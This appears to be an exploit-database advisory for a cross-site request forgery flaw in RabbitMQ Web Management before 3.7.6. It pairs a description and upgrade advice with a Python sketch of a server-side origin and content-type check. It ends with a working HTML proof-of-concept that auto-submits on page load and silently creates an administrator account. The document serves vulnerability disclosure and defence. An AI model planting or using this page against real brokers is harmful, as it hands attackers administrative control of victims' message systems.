Vendor: RabbitMQ Web Management
By: Dolev Farhi
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: RabbitMQ Web Management
Affected Version From: 3.7.6 and below
Affected Version To: 3.7.6
Patch Exists: YES
Related CWE: N/A
CPE: a:rabbitmq:rabbitmq_web_management
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
Year: 2018

RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery

A Cross-Site Request Forgery (CSRF) vulnerability exists in RabbitMQ Web Management versions prior to 3.7.6. An attacker can craft a malicious HTML page that, when visited by an authenticated user, will submit a POST request to the /api/users/rootadmin endpoint with the username, password, and tags parameters set to rootadmin, rootadmin, and administrator, respectively. This will create a new administrator user in the RabbitMQ instance.

Mitigation:

Upgrade to RabbitMQ Web Management version 3.7.6 or later.
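The advisory's fix is to upgrade, but the reason the form above works at all is that a browser attaches the victim's session to any cross-site form submission, and an HTML form can only send URL-encoded, multipart or text/plain bodies from whatever origin hosts it. The following Python is an added illustration, not RabbitMQ's code or its actual patch: it shows a generic server-side guard for a state-changing management endpoint that rejects exactly that request shape (non-JSON body, untrusted or missing Origin/Referer) while letting the management UI's own JSON calls through. The trusted origin, the `Request` class and the sample requests are constructed for the example.

```python
"""Illustrative CSRF guard for a state-changing management API endpoint.

Added example; not RabbitMQ code and not its 3.7.6 fix. It demonstrates two
checks that together defeat the HTML-form CSRF pattern described above:
  1. require a JSON content type (an HTML form cannot send application/json);
  2. require the request's source origin (Origin, else Referer) to match the
     origin the management UI is served from.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumption for the example: the management UI is served only from here.
TRUSTED_ORIGINS = {"https://mq.example.internal:15672"}
STATE_CHANGING = {"POST", "PUT", "DELETE", "PATCH"}


@dataclass
class Request:
    """Minimal constructed stand-in for an inbound HTTP request."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)

    def header(self, name: str) -> Optional[str]:
        # Header names are case-insensitive.
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return None


def origin_of(url: str) -> str:
    """Reduce a URL (Origin or Referer value) to scheme://host[:port], lowercased."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(req: Request) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request to a management endpoint."""
    if req.method.upper() not in STATE_CHANGING:
        return True, "safe method"

    # Check 1: a browser form post cannot carry application/json.
    ctype = (req.header("Content-Type") or "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"non-JSON content type {ctype or '<none>'}"

    # Check 2: the request must come from the UI's own origin.
    source = req.header("Origin") or req.header("Referer")
    if not source:
        return False, "no Origin or Referer on state-changing request"
    trusted = {o.lower() for o in TRUSTED_ORIGINS}
    if origin_of(source) not in trusted:
        return False, f"untrusted origin {origin_of(source)}"
    return True, "trusted origin, JSON body"


# Constructed sample requests: the management UI creating a user the normal
# way, and the cross-site form submission shape used by the PoC above.
UI_REQUEST = Request(
    "PUT", "/api/users/alice",
    {"Origin": "https://mq.example.internal:15672",
     "Content-Type": "application/json"},
)
CSRF_REQUEST = Request(
    "POST", "/api/users/rootadmin",
    {"Origin": "http://attacker.example",
     "Content-Type": "application/x-www-form-urlencoded"},
)

if __name__ == "__main__":
    for label, req in (("ui", UI_REQUEST), ("csrf", CSRF_REQUEST)):
        allowed, reason = csrf_check(req)
        print(f"{label:5} {req.method} {req.path}: {'ALLOW' if allowed else 'DENY'} ({reason})")
```

The content-type check is what matters most here: even if an attacker page can produce a JSON-looking body via a text/plain form, the declared content type still is not application/json, so the request is refused before any authentication context is consulted. The origin check is the belt-and-braces layer for clients that can set arbitrary headers but are still bound by the same-origin policy.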

Exploit-DB raw data:

# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu

<html>
<body>
<h2>Add RabbitMQ Admin</h2>

<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit" value="save" />
</form>

<script>
  // Submit the form automatically once the page has finished loading
  window.onload = function () { document.getElementById("rabbit").submit(); };
</script>

</body>
</html>